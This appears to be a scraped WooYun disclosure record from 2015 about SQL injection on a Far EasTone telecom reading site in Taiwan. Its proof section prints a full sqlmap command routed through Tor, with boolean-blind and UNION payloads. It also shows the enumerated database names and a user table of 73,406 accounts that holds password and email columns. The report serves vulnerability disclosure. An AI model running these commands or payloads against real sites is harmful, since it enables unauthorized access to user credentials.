台湾遠傳電信旗下某阅读网站SQL注入影响7万用户数据（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0143307

漏洞标题：台湾遠傳電信旗下某阅读网站SQL注入影响7万用户数据（臺灣地區）

漏洞作者：路人甲

提交时间：2015-09-25 08:17

修复时间：2015-11-09 09:48

公开时间：2015-11-09 09:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-25：细节已通知厂商并且等待厂商处理中
2015-09-25：厂商已经确认，细节仅向厂商公开
2015-10-05：细节向核心白帽子及相关领域专家公开
2015-10-15：细节向普通白帽子公开
2015-10-25：细节向实习白帽子公开
2015-11-09：细节向公众公开

简要描述：

台湾遠傳電信旗下某阅读网站SQL注入,影响7万用户数据

详细说明：

台湾遠傳電信旗下某阅读网站SQL注入,影响7万用户数据

漏洞证明：

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "http://**.**.**.**/FETBook/web/WebProductMain.do?pid=3" -p pid --dbs --is-dba
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=3' AND 1205=1205 AND 'XIiE'='XIiE
    Type: UNION query
    Title: MySQL UNION query (N) - 9 columns
    Payload: pid=3' UNION ALL SELECT 'N','N','N','N','N',CONCAT(0x7178717a71,0x414e4b42507654647848,0x7170766271),'N','N','N'#
---
[15:54:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache, JSP
back-end DBMS: MySQL 5
available databases [7]:
[*] book
[*] bookold
[*] drm
[*] information_schema
[*] mysql
[*] reading_utf8
[*] test
Database: drm
Table: Lib_User_Data
[14 columns]
+----------------------+---------------------------+
| Column               | Type                      |
+----------------------+---------------------------+
| Build_Date           | datetime                  |
| Con_Email            | varchar(255)              |
| Device_ID            | varchar(255)              |
| Device_Register_Date | datetime                  |
| Device_Type          | varchar(32)               |
| EMail                | varchar(765)              |
| End_Date             | datetime                  |
| Lib_Account          | varchar(255)              |
| Lib_User_ID          | int(11) unsigned zerofill |
| PassWord             | varchar(255)              |
| permit               | varchar(1)                |
| permit_code          | varchar(128)              |
| Reader_Account       | varchar(255)              |
| UDN_Account          | varchar(255)              |
+----------------------+---------------------------+
Database: drm
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| Lib_User_Data | 73406   |
+---------------+---------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-09-25 09:47

厂商回复：

感謝通知！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0143307

漏洞标题：台湾遠傳電信旗下某阅读网站SQL注入影响7万用户数据（臺灣地區）

相关厂商：台湾遠傳電信

漏洞作者：路人甲

提交时间：2015-09-25 08:17

修复时间：2015-11-09 09:48

公开时间：2015-11-09 09:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0143307

漏洞标题：台湾遠傳電信旗下某阅读网站SQL注入影响7万用户数据（臺灣地區）

相关厂商：台湾遠傳電信

漏洞作者： 路人甲

提交时间：2015-09-25 08:17

修复时间：2015-11-09 09:48

公开时间：2015-11-09 09:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：17

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0143307"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云